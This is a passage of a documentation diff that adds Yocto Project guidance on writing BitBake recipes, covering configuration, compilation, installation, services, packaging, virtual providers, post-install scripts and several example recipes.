+   and your recipe does not have to contain a
+   :ref:`ref-tasks-configure` task.
+   However, you might still want to make some adjustments. For example,
+   you can set
+   :term:`EXTRA_OECONF` or
+   :term:`PACKAGECONFIG_CONFARGS`
+   to pass any needed configure options that are specific to the recipe.
+
+-  *CMake:* If your source files have a ``CMakeLists.txt`` file, then
+   your software is built using CMake. If this is the case, you just
+   need to worry about modifying the configuration.
+
+   When you use CMake, your recipe needs to inherit the
+   :ref:`cmake <ref-classes-cmake>` class and your
+   recipe does not have to contain a
+   :ref:`ref-tasks-configure` task.
+   You can make some adjustments by setting
+   :term:`EXTRA_OECMAKE` to
+   pass any needed configure options that are specific to the recipe.
+
+   .. note::
+
+      If you need to install one or more custom CMake toolchain files
+      that are supplied by the application you are building, install the
+      files to ``${D}${datadir}/cmake/Modules`` during ``do_install``.
+
+-  *Other:* If your source files do not have a ``configure.ac`` or
+   ``CMakeLists.txt`` file, then your software is built using some
+   method other than Autotools or CMake. If this is the case, you
+   normally need to provide a
+   :ref:`ref-tasks-configure` task
+   in your recipe unless, of course, there is nothing to configure.
+
+   Even if your software is not being built by Autotools or CMake, you
+   still might not need to deal with any configuration issues. You need
+   to determine if configuration is even a required step. You might need
+   to modify a Makefile or some configuration file used for the build to
+   specify necessary build options. Or, perhaps you might need to run a
+   provided, custom configure script with the appropriate options.
+
+   For the case involving a custom configure script, you would run
+   ``./configure --help`` and look for the options you need to set.
+
+Once configuration succeeds, it is always good practice to look at the
+``log.do_configure`` file to ensure that the appropriate options have
+been enabled and no additional build-time dependencies need to be added
+to ``DEPENDS``. For example, if the configure script reports that it
+found something not mentioned in ``DEPENDS``, or that it did not find
+something that it needed for some desired optional functionality, then
+you would need to add those to ``DEPENDS``. Looking at the log might
+also reveal items being checked for, enabled, or both that you do not
+want, or items not being found that are in ``DEPENDS``, in which case
+you would need to look at passing extra options to the configure script
+as needed. For reference information on configure options specific to
+the software you are building, you can consult the output of the
+``./configure --help`` command within ``${S}`` or consult the software's
+upstream documentation.
+
+.. _new-recipe-using-headers-to-interface-with-devices:
+
+Using Headers to Interface with Devices
+---------------------------------------
+
+If your recipe builds an application that needs to communicate with some
+device or needs an API into a custom kernel, you will need to provide
+appropriate header files. Under no circumstances should you ever modify
+the existing
+``meta/recipes-kernel/linux-libc-headers/linux-libc-headers.inc`` file.
+These headers are used to build ``libc`` and must not be compromised
+with custom or machine-specific header information. If you customize
+``libc`` through modified headers all other applications that use
+``libc`` thus become affected.
+
+.. note::
+
+   Never copy and customize the ``libc`` header file (i.e.
+   ``meta/recipes-kernel/linux-libc-headers/linux-libc-headers.inc``).
+
+The correct way to interface to a device or custom kernel is to use a
+separate package that provides the additional headers for the driver or
+other unique interfaces. When doing so, your application also becomes
+responsible for creating a dependency on that specific provider.
+
+Consider the following:
+
+-  Never modify ``linux-libc-headers.inc``. Consider that file to be
+   part of the ``libc`` system, and not something you use to access the
+   kernel directly. You should access ``libc`` through specific ``libc``
+   calls.
+
+-  Applications that must talk directly to devices should either provide
+   necessary headers themselves, or establish a dependency on a special
+   headers package that is specific to that driver.
+
+For example, suppose you want to modify an existing header that adds I/O
+control or network support. If the modifications are used by a small
+number programs, providing a unique version of a header is easy and has
+little impact. When doing so, bear in mind the guidelines in the
+previous list.
+
+.. note::
+
+   If for some reason your changes need to modify the behavior of the ``libc``,
+   and subsequently all other applications on the system, use a ``.bbappend``
+   to modify the ``linux-kernel-headers.inc`` file. However, take care to not
+   make the changes machine specific.
+
+Consider a case where your kernel is older and you need an older
+``libc`` ABI. The headers installed by your recipe should still be a
+standard mainline kernel, not your own custom one.
+
+When you use custom kernel headers you need to get them from
+:term:`STAGING_KERNEL_DIR`,
+which is the directory with kernel headers that are required to build
+out-of-tree modules. Your recipe will also need the following:
+::
+
+   do_configure[depends] += "virtual/kernel:do_shared_workdir"
+
+.. _new-recipe-compilation:
+
+Compilation
+-----------
+
+During a build, the ``do_compile`` task happens after source is fetched,
+unpacked, and configured. If the recipe passes through ``do_compile``
+successfully, nothing needs to be done.
+
+However, if the compile step fails, you need to diagnose the failure.
+Here are some common issues that cause failures.
+
+.. note::
+
+   For cases where improper paths are detected for configuration files
+   or for when libraries/headers cannot be found, be sure you are using
+   the more robust ``pkg-config``. See the note in section
+   ":ref:`new-recipe-configuring-the-recipe`" for additional information.
+
+-  *Parallel build failures:* These failures manifest themselves as
+   intermittent errors, or errors reporting that a file or directory
+   that should be created by some other part of the build process could
+   not be found. This type of failure can occur even if, upon
+   inspection, the file or directory does exist after the build has
+   failed, because that part of the build process happened in the wrong
+   order.
+
+   To fix the problem, you need to either satisfy the missing dependency
+   in the Makefile or whatever script produced the Makefile, or (as a
+   workaround) set :term:`PARALLEL_MAKE` to an empty string:
+   ::
+
+      PARALLEL_MAKE = ""
+
+   For information on parallel Makefile issues, see the "`Debugging
+   Parallel Make Races <#debugging-parallel-make-races>`__" section.
+
+-  *Improper host path usage:* This failure applies to recipes building
+   for the target or ``nativesdk`` only. The failure occurs when the
+   compilation process uses improper headers, libraries, or other files
+   from the host system when cross-compiling for the target.
+
+   To fix the problem, examine the ``log.do_compile`` file to identify
+   the host paths being used (e.g. ``/usr/include``, ``/usr/lib``, and
+   so forth) and then either add configure options, apply a patch, or do
+   both.
+
+-  *Failure to find required libraries/headers:* If a build-time
+   dependency is missing because it has not been declared in
+   :term:`DEPENDS`, or because the
+   dependency exists but the path used by the build process to find the
+   file is incorrect and the configure step did not detect it, the
+   compilation process could fail. For either of these failures, the
+   compilation process notes that files could not be found. In these
+   cases, you need to go back and add additional options to the
+   configure script as well as possibly add additional build-time
+   dependencies to ``DEPENDS``.
+
+   Occasionally, it is necessary to apply a patch to the source to
+   ensure the correct paths are used. If you need to specify paths to
+   find files staged into the sysroot from other recipes, use the
+   variables that the OpenEmbedded build system provides (e.g.
+   ``STAGING_BINDIR``, ``STAGING_INCDIR``, ``STAGING_DATADIR``, and so
+   forth).
+
+.. _new-recipe-installing:
+
+Installing
+----------
+
+During ``do_install``, the task copies the built files along with their
+hierarchy to locations that would mirror their locations on the target
+device. The installation process copies files from the
+``${``\ :term:`S`\ ``}``,
+``${``\ :term:`B`\ ``}``, and
+``${``\ :term:`WORKDIR`\ ``}``
+directories to the ``${``\ :term:`D`\ ``}``
+directory to create the structure as it should appear on the target
+system.
+
+How your software is built affects what you must do to be sure your
+software is installed correctly. The following list describes what you
+must do for installation depending on the type of build system used by
+the software being built:
+
+-  *Autotools and CMake:* If the software your recipe is building uses
+   Autotools or CMake, the OpenEmbedded build system understands how to
+   install the software. Consequently, you do not have to have a
+   ``do_install`` task as part of your recipe. You just need to make
+   sure the install portion of the build completes with no issues.
+   However, if you wish to install additional files not already being
+   installed by ``make install``, you should do this using a
+   ``do_install_append`` function using the install command as described
+   in the "Manual" bulleted item later in this list.
+
+-  *Other (using* ``make install``\ *)*: You need to define a ``do_install``
+   function in your recipe. The function should call
+   ``oe_runmake install`` and will likely need to pass in the
+   destination directory as well. How you pass that path is dependent on
+   how the ``Makefile`` being run is written (e.g. ``DESTDIR=${D}``,
+   ``PREFIX=${D}``, ``INSTALLROOT=${D}``, and so forth).
+
+   For an example recipe using ``make install``, see the
+   "`Makefile-Based Package <#new-recipe-makefile-based-package>`__"
+   section.
+
+-  *Manual:* You need to define a ``do_install`` function in your
+   recipe. The function must first use ``install -d`` to create the
+   directories under
+   ``${``\ :term:`D`\ ``}``. Once the
+   directories exist, your function can use ``install`` to manually
+   install the built software into the directories.
+
+   You can find more information on ``install`` at
+   https://www.gnu.org/software/coreutils/manual/html_node/install-invocation.html.
+
+For the scenarios that do not use Autotools or CMake, you need to track
+the installation and diagnose and fix any issues until everything
+installs correctly. You need to look in the default location of
+``${D}``, which is ``${WORKDIR}/image``, to be sure your files have been
+installed correctly.
+
+.. note::
+
+   -  During the installation process, you might need to modify some of
+      the installed files to suit the target layout. For example, you
+      might need to replace hard-coded paths in an initscript with
+      values of variables provided by the build system, such as
+      replacing ``/usr/bin/`` with ``${bindir}``. If you do perform such
+      modifications during ``do_install``, be sure to modify the
+      destination file after copying rather than before copying.
+      Modifying after copying ensures that the build system can
+      re-execute ``do_install`` if needed.
+
+   -  ``oe_runmake install``, which can be run directly or can be run
+      indirectly by the
+      :ref:`autotools <ref-classes-autotools>` and
+      :ref:`cmake <ref-classes-cmake>` classes,
+      runs ``make install`` in parallel. Sometimes, a Makefile can have
+      missing dependencies between targets that can result in race
+      conditions. If you experience intermittent failures during
+      ``do_install``, you might be able to work around them by disabling
+      parallel Makefile installs by adding the following to the recipe:
+      ::
+
+         PARALLEL_MAKEINST = ""
+
+      See :term:`PARALLEL_MAKEINST` for additional information.
+
+   -  If you need to install one or more custom CMake toolchain files
+      that are supplied by the application you are building, install the
+      files to ``${D}${datadir}/cmake/Modules`` during
+      :ref:`ref-tasks-install`.
+
+.. _new-recipe-enabling-system-services:
+
+Enabling System Services
+------------------------
+
+If you want to install a service, which is a process that usually starts
+on boot and runs in the background, then you must include some
+additional definitions in your recipe.
+
+If you are adding services and the service initialization script or the
+service file itself is not installed, you must provide for that
+installation in your recipe using a ``do_install_append`` function. If
+your recipe already has a ``do_install`` function, update the function
+near its end rather than adding an additional ``do_install_append``
+function.
+
+When you create the installation for your services, you need to
+accomplish what is normally done by ``make install``. In other words,
+make sure your installation arranges the output similar to how it is
+arranged on the target system.
+
+The OpenEmbedded build system provides support for starting services two
+different ways:
+
+-  *SysVinit:* SysVinit is a system and service manager that manages the
+   init system used to control the very basic functions of your system.
+   The init program is the first program started by the Linux kernel
+   when the system boots. Init then controls the startup, running and
+   shutdown of all other programs.
+
+   To enable a service using SysVinit, your recipe needs to inherit the
+   :ref:`update-rc.d <ref-classes-update-rc.d>`
+   class. The class helps facilitate safely installing the package on
+   the target.
+
+   You will need to set the
+   :term:`INITSCRIPT_PACKAGES`,
+   :term:`INITSCRIPT_NAME`,
+   and
+   :term:`INITSCRIPT_PARAMS`
+   variables within your recipe.
+
+-  *systemd:* System Management Daemon (systemd) was designed to replace
+   SysVinit and to provide enhanced management of services. For more
+   information on systemd, see the systemd homepage at
+   https://freedesktop.org/wiki/Software/systemd/.
+
+   To enable a service using systemd, your recipe needs to inherit the
+   :ref:`systemd <ref-classes-systemd>` class. See
+   the ``systemd.bbclass`` file located in your :term:`Source Directory`
+   section for
+   more information.
+
+.. _new-recipe-packaging:
+
+Packaging
+---------
+
+Successful packaging is a combination of automated processes performed
+by the OpenEmbedded build system and some specific steps you need to
+take. The following list describes the process:
+
+-  *Splitting Files*: The ``do_package`` task splits the files produced
+   by the recipe into logical components. Even software that produces a
+   single binary might still have debug symbols, documentation, and
+   other logical components that should be split out. The ``do_package``
+   task ensures that files are split up and packaged correctly.
+
+-  *Running QA Checks*: The
+   :ref:`insane <ref-classes-insane>` class adds a
+   step to the package generation process so that output quality
+   assurance checks are generated by the OpenEmbedded build system. This
+   step performs a range of checks to be sure the build's output is free
+   of common problems that show up during runtime. For information on
+   these checks, see the
+   :ref:`insane <ref-classes-insane>` class and
+   the ":ref:`ref-manual/ref-qa-checks:qa error and warning messages`"
+   chapter in the Yocto Project Reference Manual.
+
+-  *Hand-Checking Your Packages*: After you build your software, you
+   need to be sure your packages are correct. Examine the
+   ``${``\ :term:`WORKDIR`\ ``}/packages-split``
+   directory and make sure files are where you expect them to be. If you
+   discover problems, you can set
+   :term:`PACKAGES`,
+   :term:`FILES`,
+   ``do_install(_append)``, and so forth as needed.
+
+-  *Splitting an Application into Multiple Packages*: If you need to
+   split an application into several packages, see the "`Splitting an
+   Application into Multiple
+   Packages <#splitting-an-application-into-multiple-packages>`__"
+   section for an example.
+
+-  *Installing a Post-Installation Script*: For an example showing how
+   to install a post-installation script, see the "`Post-Installation
+   Scripts <#new-recipe-post-installation-scripts>`__" section.
+
+-  *Marking Package Architecture*: Depending on what your recipe is
+   building and how it is configured, it might be important to mark the
+   packages produced as being specific to a particular machine, or to
+   mark them as not being specific to a particular machine or
+   architecture at all.
+
+   By default, packages apply to any machine with the same architecture
+   as the target machine. When a recipe produces packages that are
+   machine-specific (e.g. the
+   :term:`MACHINE` value is passed
+   into the configure script or a patch is applied only for a particular
+   machine), you should mark them as such by adding the following to the
+   recipe:
+   ::
+
+      PACKAGE_ARCH = "${MACHINE_ARCH}"
+
+   On the other hand, if the recipe produces packages that do not
+   contain anything specific to the target machine or architecture at
+   all (e.g. recipes that simply package script files or configuration
+   files), you should use the
+   :ref:`allarch <ref-classes-allarch>` class to
+   do this for you by adding this to your recipe:
+   ::
+
+      inherit allarch
+
+   Ensuring that the package architecture is correct is not critical
+   while you are doing the first few builds of your recipe. However, it
+   is important in order to ensure that your recipe rebuilds (or does
+   not rebuild) appropriately in response to changes in configuration,
+   and to ensure that you get the appropriate packages installed on the
+   target machine, particularly if you run separate builds for more than
+   one target machine.
+
+.. _new-sharing-files-between-recipes:
+
+Sharing Files Between Recipes
+-----------------------------
+
+Recipes often need to use files provided by other recipes on the build
+host. For example, an application linking to a common library needs
+access to the library itself and its associated headers. The way this
+access is accomplished is by populating a sysroot with files. Each
+recipe has two sysroots in its work directory, one for target files
+(``recipe-sysroot``) and one for files that are native to the build host
+(``recipe-sysroot-native``).
+
+.. note::
+
+   You could find the term "staging" used within the Yocto project
+   regarding files populating sysroots (e.g. the :term:`STAGING_DIR`
+   variable).
+
+Recipes should never populate the sysroot directly (i.e. write files
+into sysroot). Instead, files should be installed into standard
+locations during the
+:ref:`ref-tasks-install` task within
+the ``${``\ :term:`D`\ ``}`` directory. The
+reason for this limitation is that almost all files that populate the
+sysroot are cataloged in manifests in order to ensure the files can be
+removed later when a recipe is either modified or removed. Thus, the
+sysroot is able to remain free from stale files.
+
+A subset of the files installed by the
+:ref:`ref-tasks-install` task are
+used by the
+:ref:`ref-tasks-populate_sysroot`
+task as defined by the the
+:term:`SYSROOT_DIRS` variable to
+automatically populate the sysroot. It is possible to modify the list of
+directories that populate the sysroot. The following example shows how
+you could add the ``/opt`` directory to the list of directories within a
+recipe:
+::
+
+   SYSROOT_DIRS += "/opt"
+
+For a more complete description of the
+:ref:`ref-tasks-populate_sysroot`
+task and its associated functions, see the
+:ref:`staging <ref-classes-staging>` class.
+
+.. _metadata-virtual-providers:
+
+Using Virtual Providers
+-----------------------
+
+Prior to a build, if you know that several different recipes provide the
+same functionality, you can use a virtual provider (i.e. ``virtual/*``)
+as a placeholder for the actual provider. The actual provider is
+determined at build-time.
+
+A common scenario where a virtual provider is used would be for the
+kernel recipe. Suppose you have three kernel recipes whose
+:term:`PN` values map to ``kernel-big``,
+``kernel-mid``, and ``kernel-small``. Furthermore, each of these recipes
+in some way uses a :term:`PROVIDES`
+statement that essentially identifies itself as being able to provide
+``virtual/kernel``. Here is one way through the
+:ref:`kernel <ref-classes-kernel>` class:
+::
+
+   PROVIDES += "${@ "virtual/kernel" if (d.getVar("KERNEL_PACKAGE_NAME") == "kernel") else "" }"
+
+Any recipe that inherits the ``kernel`` class is
+going to utilize a ``PROVIDES`` statement that identifies that recipe as
+being able to provide the ``virtual/kernel`` item.
+
+Now comes the time to actually build an image and you need a kernel
+recipe, but which one? You can configure your build to call out the
+kernel recipe you want by using the
+:term:`PREFERRED_PROVIDER`
+variable. As an example, consider the
+:yocto_git:`x86-base.inc </cgit/cgit.cgi/poky/tree/meta/conf/machine/include/x86-base.inc>`
+include file, which is a machine (i.e.
+:term:`MACHINE`) configuration file.
+This include file is the reason all x86-based machines use the
+``linux-yocto`` kernel. Here are the relevant lines from the include
+file:
+::
+
+   PREFERRED_PROVIDER_virtual/kernel ??= "linux-yocto"
+   PREFERRED_VERSION_linux-yocto ??= "4.15%"
+
+When you use a virtual provider, you do not have to "hard code" a recipe
+name as a build dependency. You can use the
+:term:`DEPENDS` variable to state the
+build is dependent on ``virtual/kernel`` for example:
+::
+
+   DEPENDS = "virtual/kernel"
+
+During the build, the OpenEmbedded build system picks
+the correct recipe needed for the ``virtual/kernel`` dependency based on
+the ``PREFERRED_PROVIDER`` variable. If you want to use the small kernel
+mentioned at the beginning of this section, configure your build as
+follows:
+::
+
+   PREFERRED_PROVIDER_virtual/kernel ??= "kernel-small"
+
+.. note::
+
+   Any recipe that ``PROVIDES`` a ``virtual/*`` item that is ultimately not
+   selected through ``PREFERRED_PROVIDER`` does not get built. Preventing these
+   recipes from building is usually the desired behavior since this mechanism's
+   purpose is to select between mutually exclusive alternative providers.
+
+The following lists specific examples of virtual providers:
+
+-  ``virtual/kernel``: Provides the name of the kernel recipe to use
+   when building a kernel image.
+
+-  ``virtual/bootloader``: Provides the name of the bootloader to use
+   when building an image.
+
+-  ``virtual/libgbm``: Provides ``gbm.pc``.
+
+-  ``virtual/egl``: Provides ``egl.pc`` and possibly ``wayland-egl.pc``.
+
+-  ``virtual/libgl``: Provides ``gl.pc`` (i.e. libGL).
+
+-  ``virtual/libgles1``: Provides ``glesv1_cm.pc`` (i.e. libGLESv1_CM).
+
+-  ``virtual/libgles2``: Provides ``glesv2.pc`` (i.e. libGLESv2).
+
+.. note::
+
+   Virtual providers only apply to build time dependencies specified with
+   :term:`PROVIDES` and :term:`DEPENDS`. They do not apply to runtime
+   dependencies specified with :term:`RPROVIDES` and :term:`RDEPENDS`.
+
+Properly Versioning Pre-Release Recipes
+---------------------------------------
+
+Sometimes the name of a recipe can lead to versioning problems when the
+recipe is upgraded to a final release. For example, consider the
+``irssi_0.8.16-rc1.bb`` recipe file in the list of example recipes in
+the "`Storing and Naming the
+Recipe <#new-recipe-storing-and-naming-the-recipe>`__" section. This
+recipe is at a release candidate stage (i.e. "rc1"). When the recipe is
+released, the recipe filename becomes ``irssi_0.8.16.bb``. The version
+change from ``0.8.16-rc1`` to ``0.8.16`` is seen as a decrease by the
+build system and package managers, so the resulting packages will not
+correctly trigger an upgrade.
+
+In order to ensure the versions compare properly, the recommended
+convention is to set :term:`PV` within the
+recipe to "previous_version+current_version". You can use an additional
+variable so that you can use the current version elsewhere. Here is an
+example:
+::
+
+   REALPV = "0.8.16-rc1"
+   PV = "0.8.15+${REALPV}"
+
+.. _new-recipe-post-installation-scripts:
+
+Post-Installation Scripts
+-------------------------
+
+Post-installation scripts run immediately after installing a package on
+the target or during image creation when a package is included in an
+image. To add a post-installation script to a package, add a
+``pkg_postinst_``\ `PACKAGENAME`\ ``()`` function to the recipe file
+(``.bb``) and replace `PACKAGENAME` with the name of the package you want
+to attach to the ``postinst`` script. To apply the post-installation
+script to the main package for the recipe, which is usually what is
+required, specify
+``${``\ :term:`PN`\ ``}`` in place of
+PACKAGENAME.
+
+A post-installation function has the following structure:
+::
+
+   pkg_postinst_PACKAGENAME() {
+       # Commands to carry out
+   }
+
+The script defined in the post-installation function is called when the
+root filesystem is created. If the script succeeds, the package is
+marked as installed.
+
+.. note::
+
+   Any RPM post-installation script that runs on the target should
+   return a 0 exit code. RPM does not allow non-zero exit codes for
+   these scripts, and the RPM package manager will cause the package to
+   fail installation on the target.
+
+Sometimes it is necessary for the execution of a post-installation
+script to be delayed until the first boot. For example, the script might
+need to be executed on the device itself. To delay script execution
+until boot time, you must explicitly mark post installs to defer to the
+target. You can use ``pkg_postinst_ontarget()`` or call
+``postinst_intercept delay_to_first_boot`` from ``pkg_postinst()``. Any
+failure of a ``pkg_postinst()`` script (including exit 1) triggers an
+error during the
+:ref:`ref-tasks-rootfs` task.
+
+If you have recipes that use ``pkg_postinst`` function and they require
+the use of non-standard native tools that have dependencies during
+rootfs construction, you need to use the
+:term:`PACKAGE_WRITE_DEPS`
+variable in your recipe to list these tools. If you do not use this
+variable, the tools might be missing and execution of the
+post-installation script is deferred until first boot. Deferring the
+script to first boot is undesirable and for read-only rootfs impossible.
+
+.. note::
+
+   Equivalent support for pre-install, pre-uninstall, and post-uninstall
+   scripts exist by way of ``pkg_preinst``, ``pkg_prerm``, and ``pkg_postrm``,
+   respectively. These scrips work in exactly the same way as does
+   ``pkg_postinst`` with the exception that they run at different times. Also,
+   because of when they run, they are not applicable to being run at image
+   creation time like ``pkg_postinst``.
+
+.. _new-recipe-testing:
+
+Testing
+-------
+
+The final step for completing your recipe is to be sure that the
+software you built runs correctly. To accomplish runtime testing, add
+the build's output packages to your image and test them on the target.
+
+For information on how to customize your image by adding specific
+packages, see the "`Customizing
+Images <#usingpoky-extend-customimage>`__" section.
+
+.. _new-recipe-testing-examples:
+
+Examples
+--------
+
+To help summarize how to write a recipe, this section provides some
+examples given various scenarios:
+
+-  Recipes that use local files
+
+-  Using an Autotooled package
+
+-  Using a Makefile-based package
+
+-  Splitting an application into multiple packages
+
+-  Adding binaries to an image
+
+.. _new-recipe-single-c-file-package-hello-world:
+
+Single .c File Package (Hello World!)
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Building an application from a single file that is stored locally (e.g.
+under ``files``) requires a recipe that has the file listed in the
+``SRC_URI`` variable. Additionally, you need to manually write the
+``do_compile`` and ``do_install`` tasks. The ``S`` variable defines the
+directory containing the source code, which is set to
+:term:`WORKDIR` in this case - the
+directory BitBake uses for the build.
+::
+
+   SUMMARY = "Simple helloworld application"
+   SECTION = "examples"
+   LICENSE = "MIT"
+   LIC_FILES_CHKSUM = "file://${COMMON_LICENSE_DIR}/MIT;md5=0835ade698e0bcf8506ecda2f7b4f302"
+
+   SRC_URI = "file://helloworld.c"
+
+   S = "${WORKDIR}"
+
+   do_compile() {
+       ${CC} helloworld.c -o helloworld
+   }
+
+   do_install() {
+       install -d ${D}${bindir}
+       install -m 0755 helloworld ${D}${bindir}
+   }
+
+By default, the ``helloworld``, ``helloworld-dbg``, and
+``helloworld-dev`` packages are built. For information on how to
+customize the packaging process, see the "`Splitting an Application into
+Multiple Packages <#splitting-an-application-into-multiple-packages>`__"
+section.
+
+.. _new-recipe-autotooled-package:
+
+Autotooled Package
+~~~~~~~~~~~~~~~~~~
+
+Applications that use Autotools such as ``autoconf`` and ``automake``
+require a recipe that has a source archive listed in ``SRC_URI`` and
+also inherit the
+:ref:`autotools <ref-classes-autotools>` class,
+which contains the definitions of all the steps needed to build an
+Autotool-based application. The result of the build is automatically
+packaged. And, if the application uses NLS for localization, packages
+with local information are generated (one package per language).
+Following is one example: (``hello_2.3.bb``)
+::
+
+   SUMMARY = "GNU Helloworld application"
+   SECTION = "examples"
+   LICENSE = "GPLv2+"
+   LIC_FILES_CHKSUM = "file://COPYING;md5=751419260aa954499f7abaabaa882bbe"
+
+   SRC_URI = "${GNU_MIRROR}/hello/hello-${PV}.tar.gz"
+
+   inherit autotools gettext
+
+The variable ``LIC_FILES_CHKSUM`` is used to track source license
+changes as described in the
+":ref:`dev-manual/dev-manual-common-tasks:tracking license changes`" section in
+the Yocto Project Overview and Concepts Manual. You can quickly create
+Autotool-based recipes in a manner similar to the previous example.
+
+.. _new-recipe-makefile-based-package:
+
+Makefile-Based Package
+~~~~~~~~~~~~~~~~~~~~~~
+
+Applications that use GNU ``make`` also require a recipe that has the
+source archive listed in ``SRC_URI``. You do not need to add a
+``do_compile`` step since by default BitBake starts the ``make`` command
+to compile the application. If you need additional ``make`` options, you
+should store them in the
+:term:`EXTRA_OEMAKE` or
+:term:`PACKAGECONFIG_CONFARGS`
+variables. BitBake passes these options into the GNU ``make``
+invocation. Note that a ``do_install`` task is still required.
+Otherwise, BitBake runs an empty ``do_install`` task by default.
+
+Some applications might require extra parameters to be passed to the
+compiler. For example, the application might need an additional header
+path. You can accomplish this by adding to the ``CFLAGS`` variable. The
+following example shows this:
+::
+
+   CFLAGS_prepend = "-I ${S}/include "
+
+In the following example, ``mtd-utils`` is a makefile-based package:
+::
+
+   SUMMARY = "Tools for managing memory technology devices"
+   SECTION = "base"
+   DEPENDS = "zlib lzo e2fsprogs util-linux"
+   HOMEPAGE = "http://www.linux-mtd.infradead.org/"
+   LICENSE = "GPLv2+"
+   LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3 \
+       file://include/common.h;beginline=1;endline=17;md5=ba05b07912a44ea2bf81ce409380049c"
+
+   # Use the latest version at 26 Oct, 2013
+   SRCREV = "9f107132a6a073cce37434ca9cda6917dd8d866b"
+   SRC_URI = "git://git.infradead.org/mtd-utils.git \
+       file://add-exclusion-to-mkfs-jffs2-git-2.patch \
+       "
+
+   PV = "1.5.1+git${SRCPV}"
+
+   S = "${WORKDIR}/git"
+
+   EXTRA_OEMAKE = "'CC=${CC}' 'RANLIB=${RANLIB}' 'AR=${AR}' 'CFLAGS=${CFLAGS} -I${S}/include -DWITHOUT_XATTR' 'BUILDDIR=${S}'"
+
+   do_install () {
+       oe_runmake install DESTDIR=${D} SBINDIR=${sbindir} MANDIR=${mandir} INCLUDEDIR=${includedir}
+   }
+
+   PACKAGES =+ "mtd-utils-jffs2 mtd-utils-ubifs mtd-utils-misc"
+
+   FILES_mtd-utils-jffs2 = "${sbindir}/mkfs.jffs2 ${sbindir}/jffs2dump ${sbindir}/jffs2reader ${sbindir}/sumtool"
+   FILES_mtd-utils-ubifs = "${sbindir}/mkfs.ubifs ${sbindir}/ubi*"
+   FILES_mtd-utils-misc = "${sbindir}/nftl* ${sbindir}/ftl* ${sbindir}/rfd* ${sbindir}/doc* ${sbindir}/serve_image ${sbindir}/recv_image"
+
+   PARALLEL_MAKE = ""
+
+   BBCLASSEXTEND = "native"
+
+Splitting an Application into Multiple Packages
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+You can use the variables ``PACKAGES`` and ``FILES`` to split an
+application into multiple packages.
+
+Following is an example that uses the ``libxpm`` recipe. By default,
+this recipe generates a single package that contains the library along
+with a few binaries. You can modify the recipe to split the binaries
+into separate packages:
+::
+
+   require xorg-lib-common.inc
+
+   SUMMARY = "Xpm: X Pixmap extension library"
+   LICENSE = "BSD"
+   LIC_FILES_CHKSUM = "file://COPYING;md5=51f4270b012ecd4ab1a164f5f4ed6cf7"
+   DEPENDS += "libxext libsm libxt"
+   PE = "1"
+
+   XORG_PN = "libXpm"
+
+   PACKAGES =+ "sxpm cxpm"
+   FILES_cxpm = "${bindir}/cxpm"
+   FILES_sxpm = "${bindir}/sxpm"
+
+In the previous example, we want to ship the ``sxpm`` and ``cxpm``
+binaries in separate packages. Since ``bindir`` would be packaged into
+the main ``PN`` package by default, we prepend the ``PACKAGES`` variable
+so additional package names are added to the start of list. This results
+in the extra ``FILES_*`` variables then containing information that
+define which files and directories go into which packages. Files
+included by earlier packages are skipped by latter packages. Thus, the
+main ``PN`` package does not include the above listed files.
+
+Packaging Externally Produced Binaries
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Sometimes, you need to add pre-compiled binaries to an image. For
+example, suppose that binaries for proprietary code exist, which are
+created by a particular division of a company. Your part of the company
+needs to use those binaries as part of an image that you are building
+using the OpenEmbedded build system. Since you only have the binaries
+and not the source code, you cannot use a typical recipe that expects to
+fetch the source specified in
+:term:`SRC_URI` and then compile it.
+
+One method is to package the binaries and then install them as part of
+the image. Generally, it is not a good idea to package binaries since,
+among other things, it can hinder the ability to reproduce builds and
+could lead to compatibility problems with ABI in the future. However,
+sometimes you have no choice.
+
+The easiest solution is to create a recipe that uses the
+:ref:`bin_package <ref-classes-bin-package>` class
+and to be sure that you are using default locations for build artifacts.
+In most cases, the ``bin_package`` class handles "skipping" the
+configure and compile steps as well as sets things up to grab packages
+from the appropriate area. In particular, this class sets ``noexec`` on
+both the :ref:`ref-tasks-configure`
+and :ref:`ref-tasks-compile` tasks,
+sets ``FILES_${PN}`` to "/" so that it picks up all files, and sets up a
+:ref:`ref-tasks-install` task, which
+effectively copies all files from ``${S}`` to ``${D}``. The
+``bin_package`` class works well when the files extracted into ``${S}``
+are already laid out in the way they should be laid out on the target.
+For more information on these variables, see the
+:term:`FILES`,
+:term:`PN`,
+:term:`S`, and
+:term:`D` variables in the Yocto Project
+Reference Manual's variable glossary.
+
+.. note::
+
+   -  Using :term:`DEPENDS` is a good
+      idea even for components distributed in binary form, and is often
+      necessary for shared libraries. For a shared library, listing the
+      library dependencies in ``DEPENDS`` makes sure that the libraries
+      are available in the staging sysroot when other recipes link
+      against the library, which might be necessary for successful
+      linking.
+
+   -  Using ``DEPENDS`` also allows runtime dependencies between
+      packages to be added automatically. See the
+      ":ref:`overview-manual/overview-manual-concepts:automatically added runtime dependencies`"
+      section in the Yocto Project Overview and Concepts Manual for more
+      information.
+
+If you cannot use the ``bin_package`` class, you need to be sure you are
+doing the following:
+
+-  Create a recipe where the
+   :ref:`ref-tasks-configure` and
+   :ref:`ref-tasks-compile` tasks do
+   nothing: It is usually sufficient to just not define these tasks in
+   the recipe, because the default implementations do nothing unless a
+   Makefile is found in
+   ``${``\ :term:`S`\ ``}``.
+
+   If ``${S}`` might contain a Makefile, or if you inherit some class
+   that replaces ``do_configure`` and ``do_compile`` with custom
+   versions, then you can use the
+   ``[``\ :ref:`noexec <bitbake-user-manual/bitbake-user-manual-metadata:variable flags>`\ ``]``
+   flag to turn the tasks into no-ops, as follows:
+   ::
+
+      do_configure[noexec] = "1"
+      do_compile[noexec] = "1"
+
+   Unlike
+   :ref:`bitbake:bitbake-user-manual/bitbake-user-manual-metadata:deleting a task`,
+   using the flag preserves the dependency chain from the
+   :ref:`ref-tasks-fetch`,
+   :ref:`ref-tasks-unpack`, and
+   :ref:`ref-tasks-patch` tasks to the
+   :ref:`ref-tasks-install` task.
+
+-  Make sure your ``do_install`` task installs the binaries
+   appropriately.
+
+-  Ensure that you set up :term:`FILES`
+   (usually
+   ``FILES_${``\ :term:`PN`\ ``}``) to
+   point to the files you have installed, which of course depends on
+   where you have installed them and whether those files are in
+   different locations than the defaults.
+
+.. note::
+
